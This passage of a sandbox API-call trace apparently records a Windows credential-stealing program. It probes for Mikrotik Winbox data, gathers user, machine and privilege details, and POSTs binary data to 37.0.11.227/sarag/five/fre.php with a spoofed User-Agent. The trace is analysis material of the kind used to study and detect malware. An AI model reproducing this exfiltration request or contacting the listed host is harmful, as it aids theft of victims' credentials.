(in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.681] GetProcessHeap () returned 0x690000 [0148.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.682] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.682] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0148.682] GetProcessHeap () returned 0x690000 [0148.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6aca08 [0148.683] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.684] wvsprintfW (in: param_1=0x6aca08, param_2="Mikrotik\\Winbox", arglist=0x19fb5c | out: param_1="Mikrotik\\Winbox") returned 15 [0148.684] GetProcessHeap () returned 0x690000 [0148.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x22) returned 0x6a8820 [0148.684] GetProcessHeap () returned 0x690000 [0148.685] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.685] PathFileExistsW (pszPath="Mikrotik\\Winbox") returned 0 [0148.686] GetProcessHeap () returned 0x690000 [0148.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.686] GetProcessHeap () returned 0x690000 [0148.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0148.686] GetProcessHeap () returned 0x690000 [0148.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.687] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.688] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0148.688] GetProcessHeap () returned 0x690000 [0148.688] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.689] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.689] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19f994 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0148.689] GetProcessHeap () returned 0x690000 [0148.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6aa740 [0148.689] GetProcessHeap () returned 0x690000 [0148.690] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.691] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0xffffffff [0148.691] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9"), lpSecurityAttributes=0x0) returned 1 [0148.692] GetProcessHeap () returned 0x690000 [0148.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f50) returned 0x6aca08 [0148.693] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.694] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s.%s", arglist=0x19f9a8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0148.694] GetProcessHeap () returned 0x690000 [0148.694] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a73f0 [0148.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.696] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.697] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0148.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a73f0 | out: hHeap=0x690000) returned 1 [0148.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1388) returned 0x6ab500 [0148.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b3e0 [0148.698] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x11c) returned 0x6aa2c8 [0148.700] RtlGetVersion (in: lpVersionInformation=0x6aa2c8 | out: lpVersionInformation=0x6aa2c8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0148.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.746] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0xc5e0584d, dwHighDateTime=0x1d86053)) [0148.747] GetProcessHeap () returned 0x690000 [0148.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7) returned 0x6ab410 [0148.747] GetProcessHeap () returned 0x690000 [0148.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1a5) returned 0x6aa530 [0148.747] GetProcessHeap () returned 0x690000 [0148.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0000) returned 0x5e7020 [0148.772] GetProcessHeap () returned 0x690000 [0148.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x5e7020 | out: hHeap=0x690000) returned 1 [0148.779] GetProcessHeap () returned 0x690000 [0148.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aca08 [0148.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.782] GetUserNameW (in: lpBuffer=0x6aca08, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0148.784] GetProcessHeap () returned 0x690000 [0148.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.784] GetProcessHeap () returned 0x690000 [0148.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aca08 [0148.785] GetComputerNameW (in: lpBuffer=0x6aca08, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0148.785] GetProcessHeap () returned 0x690000 [0148.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.785] GetCurrentThread () returned 0xfffffffe [0148.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.787] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0148.787] GetLastError () returned 0x3f0 [0148.787] GetCurrentProcess () returned 0xffffffff [0148.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.788] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x210) returned 1 [0148.788] GetProcessHeap () returned 0x690000 [0148.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aca08 [0148.788] GetProcessHeap () returned 0x690000 [0148.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad0e8 [0148.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.789] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0148.789] GetProcessHeap () returned 0x690000 [0148.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0148.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.790] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x6a8a00, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x6a8a00, ReturnLength=0x19fb70) returned 1 [0148.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.791] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6a8a08*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x6aca08, cchName=0x19fb60, ReferencedDomainName=0x6ad0e8, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0148.793] GetProcessHeap () returned 0x690000 [0148.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f44) returned 0x6ae808 [0148.794] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.795] wvsprintfW (in: param_1=0x6ae808, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0148.795] GetProcessHeap () returned 0x690000 [0148.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x69b530 [0148.795] GetProcessHeap () returned 0x690000 [0148.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae808 | out: hHeap=0x690000) returned 1 [0148.795] GetProcessHeap () returned 0x690000 [0148.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0148.796] CloseHandle (hObject=0x210) returned 1 [0148.796] GetProcessHeap () returned 0x690000 [0148.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad0e8 | out: hHeap=0x690000) returned 1 [0148.796] GetProcessHeap () returned 0x690000 [0148.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.796] GetProcessHeap () returned 0x690000 [0148.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b530 | out: hHeap=0x690000) returned 1 [0148.797] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.797] GetDesktopWindow () returned 0x10010 [0148.798] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.799] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0148.802] GetProcessHeap () returned 0x690000 [0148.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8) returned 0x6ab340 [0148.802] GetProcessHeap () returned 0x690000 [0148.802] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0148.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.803] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0148.804] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76540000 [0148.946] GetProcAddress (hModule=0x76540000, lpProcName="NetUserGetInfo") returned 0x6c7e33a0 [0149.058] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x6a4778*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xbbe6b, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0149.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.266] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x69b530*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0149.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.267] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x69b530*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0149.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.268] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0149.269] GetProcessHeap () returned 0x690000 [0149.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4220 [0149.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.296] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 0 [0149.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.309] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x6aa2c8) returned 1 [0149.320] GetProcessHeap () returned 0x690000 [0149.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87c0 [0149.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.321] CryptImportKey (in: hProv=0x6aa2c8, pbData=0x6a87c0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x69cfa8) returned 1 [0149.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.323] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0149.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.324] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0149.324] GetProcessHeap () returned 0x690000 [0149.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87c0 | out: hHeap=0x690000) returned 1 [0149.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.326] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4220, pdwDataLen=0x19f974 | out: pbData=0x6a4220, pdwDataLen=0x19f974) returned 1 [0149.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.331] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0149.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.334] CryptReleaseContext (hProv=0x6aa2c8, dwFlags=0x0) returned 1 [0149.334] GetProcessHeap () returned 0x690000 [0149.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6ad270 [0149.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0149.335] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0149.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0149.337] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0149.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0149.337] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0149.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0149.339] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0149.339] GetProcessHeap () returned 0x690000 [0149.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3240 [0149.339] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0149.340] GetProcessHeap () returned 0x690000 [0149.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0149.340] socket (af=2, type=1, protocol=6) returned 0x240 [0149.782] connect (s=0x240, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0149.811] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0149.811] GetProcessHeap () returned 0x690000 [0149.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af510 [0149.811] GetProcessHeap () returned 0x690000 [0149.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6af598 [0149.812] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0149.812] wvsprintfA (in: param_1=0x6af598, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0149.812] GetProcessHeap () returned 0x690000 [0149.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b15c0 [0149.813] GetProcessHeap () returned 0x690000 [0149.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af598 | out: hHeap=0x690000) returned 1 [0149.813] GetProcessHeap () returned 0x690000 [0149.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0149.814] GetProcessHeap () returned 0x690000 [0149.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6af598 [0149.814] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0149.815] wvsprintfA (in: param_1=0x6af598, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 288\r\nConnection: close\r\n\r\n") returned 242 [0149.815] GetProcessHeap () returned 0x690000 [0149.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6b1680 [0149.815] GetProcessHeap () returned 0x690000 [0149.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af598 | out: hHeap=0x690000) returned 1 [0149.816] send (s=0x240, buf=0x6b1680*, len=242, flags=0) returned 242 [0149.817] send (s=0x240, buf=0x6ab500*, len=288, flags=0) returned 288 [0149.817] GetProcessHeap () returned 0x690000 [0149.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af598 [0149.817] recv (in: s=0x240, buf=0x6af598, len=4048, flags=0 | out: buf=0x6af598*) returned 196 [0149.891] GetProcessHeap () returned 0x690000 [0149.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b1680 | out: hHeap=0x690000) returned 1 [0149.892] GetProcessHeap () returned 0x690000 [0149.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0149.892] GetProcessHeap () returned 0x690000 [0149.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b15c0 | out: hHeap=0x690000) returned 1 [0149.893] GetProcessHeap () returned 0x690000 [0149.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af510 | out: hHeap=0x690000) returned 1 [0149.893] closesocket (s=0x240) returned 0 [0149.894] GetProcessHeap () returned 0x690000 [0149.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0149.894] GetProcessHeap () returned 0x690000 [0149.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0149.894] GetProcessHeap () returned 0x690000 [0149.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4220 | out: hHeap=0x690000) returned 1 [0149.895] GetProcessHeap () returned 0x690000 [0149.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3240 | out: hHeap=0x690000) returned 1 [0149.895] GetProcessHeap () returned 0x690000 [0149.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0149.896] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0149.897] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6ad270 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0149.897] GetProcessHeap () returned 0x690000 [0149.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6b0570 [0149.898] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0149.899] wvsprintfW (in: param_1=0x6b0570, param_2="%s\\%s", arglist=0x19f988 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0149.899] GetProcessHeap () returned 0x690000 [0149.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6acb98 [0149.899] GetProcessHeap () returned 0x690000 [0149.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0570 | out: hHeap=0x690000) returned 1 [0149.900] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0149.900] GetProcessHeap () returned 0x690000 [0149.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f50) returned 0x6b0570 [0149.901] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0149.902] wvsprintfW (in: param_1=0x6b0570, param_2="%s\\%s.%s", arglist=0x19f99c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0149.902] GetProcessHeap () returned 0x690000 [0149.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a7df0 [0149.902] GetProcessHeap () returned 0x690000 [0149.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0570 | out: hHeap=0x690000) returned 1 [0149.902] GetProcessHeap () returned 0x690000 [0149.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6acb98 | out: hHeap=0x690000) returned 1 [0149.903] GetProcessHeap () returned 0x690000 [0149.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0149.904] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb34, dwLength=0x1c | out: lpBuffer=0x19fb34*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.906] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb14, dwLength=0x1c | out: lpBuffer=0x19fb14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.907] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0149.909] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.910] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb")) returned 0 [0149.910] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0149.912] SetFilePointer (in: hFile=0x240, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.913] WriteFile (in: hFile=0x240, lpBuffer=0x4f0000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19fb3c, lpOverlapped=0x0 | out: lpBuffer=0x4f0000*, lpNumberOfBytesWritten=0x19fb3c*=0x4, lpOverlapped=0x0) returned 1 [0149.915] CloseHandle (hObject=0x240) returned 1 [0149.916] GetProcessHeap () returned 0x690000 [0149.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7df0 | out: hHeap=0x690000) returned 1 [0149.917] GetProcessHeap () returned 0x690000 [0149.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af598 | out: hHeap=0x690000) returned 1 [0149.917] GetProcessHeap () returned 0x690000 [0149.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0149.918] GetProcessHeap () returned 0x690000 [0149.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0149.918] GetProcessHeap () returned 0x690000 [0149.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b3e0 | out: hHeap=0x690000) returned 1 [0149.918] GetProcessHeap () returned 0x690000 [0149.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0149.918] GetProcessHeap () returned 0x690000 [0149.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 [0149.919] GetProcessHeap () returned 0x690000 [0149.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b728 | out: hHeap=0x690000) returned 1 [0149.919] GetProcessHeap () returned 0x690000 [0149.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1388) returned 0x6a4fc8 